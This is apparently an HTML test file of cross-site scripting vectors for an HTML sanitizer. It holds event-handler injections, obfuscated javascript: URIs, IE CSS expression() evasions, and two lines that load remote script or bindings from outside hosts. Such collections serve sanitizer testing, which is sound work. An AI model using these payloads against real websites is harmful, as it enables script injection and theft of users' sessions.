42 lines
3.5 KiB
HTML
42 lines
3.5 KiB
HTML
<img alt="<img onmouseover=confirm(1)//" src="src" />
|
|
'';!--"=&{()}<br />
|
|
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
|
|
<img src="denied:javascript:alert('xss');" alt="image" /><br />
|
|
<img src="denied:java script:alert('xss');" alt="image" /><br />
|
|
<img src="denied:javascript:alert('XSS')" alt="image" /><br />
|
|
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
|
|
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
|
|
<br />
|
|
<br />
|
|
<br />
|
|
<!--[if gte IE 4]>alert('xss');<![endif]--><br />
|
|
" src="http://ha.ckers.org/xss.js"><br />
|
|
<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//><br />
|
|
<br />
|
|
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
|
|
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
|
|
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
|
|
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss("*/ ");xss:ex XSS*/ /pression(alert("XSS"))">x</a><br />
|
|
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
|
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
|
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
|
|
<strong>Bad IE7:</strong> <a style="xss:e #48;078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
|
|
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
|
|
</span> |